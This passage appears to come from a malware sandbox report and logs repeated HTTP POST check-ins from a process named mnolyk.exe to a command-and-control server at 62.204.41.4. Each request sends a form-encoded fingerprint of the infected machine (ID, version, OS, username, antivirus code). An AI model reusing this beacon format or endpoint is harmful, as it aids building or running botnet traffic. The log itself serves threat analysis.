                                                                      Feb 6, 2023 18:38:49.540296078 CET | 1099 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:49.603307009 CET | 1099 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      633 | 192.168.2.7 | 50362 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:49.786550999 CET | 1100 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:49.850887060 CET | 1100 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      634 | 192.168.2.7 | 50363 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:50.019718885 CET | 1101 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:50.084964991 CET | 1101 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      635 | 192.168.2.7 | 50364 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:50.253164053 CET | 1102 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:50.316068888 CET | 1102 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      636 | 192.168.2.7 | 50365 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:50.493705034 CET | 1103 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:50.557642937 CET | 1103 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      637 | 192.168.2.7 | 50366 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:50.739823103 CET | 1104 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:50.806164980 CET | 1104 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      64 | 192.168.2.7 | 49789 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:13.130119085 CET | 502 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:13.194447041 CET | 503 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      65 | 192.168.2.7 | 49790 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:13.365591049 CET | 503 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:13.429371119 CET | 504 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      66 | 192.168.2.7 | 49791 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:13.602771044 CET | 504 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:13.666631937 CET | 505 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      67 | 192.168.2.7 | 49792 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:13.832897902 CET | 505 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:13.896177053 CET | 506 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      68 | 192.168.2.7 | 49793 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:14.067336082 CET | 506 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:14.132473946 CET | 507 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      69 | 192.168.2.7 | 49794 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:14.301275015 CET | 507 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:14.363877058 CET | 508 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      7 | 192.168.2.7 | 49731 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:35:58.287698030 CET | 438 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:58.349608898 CET | 439 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      70 | 192.168.2.7 | 49795 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:14.536822081 CET | 508 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:14.600203991 CET | 509 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      71 | 192.168.2.7 | 49796 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:14.772958994 CET | 509 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:14.838946104 CET | 510 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      72 | 192.168.2.7 | 49797 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:15.167905092 CET | 510 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:15.234064102 CET | 511 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      73 | 192.168.2.7 | 49798 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:15.438756943 CET | 511 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:15.502535105 CET | 512 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      74 | 192.168.2.7 | 49799 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:15.767937899 CET | 512 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:15.831954956 CET | 513 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      75 | 192.168.2.7 | 49800 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:16.519326925 CET | 513 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:16.584275961 CET | 514 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
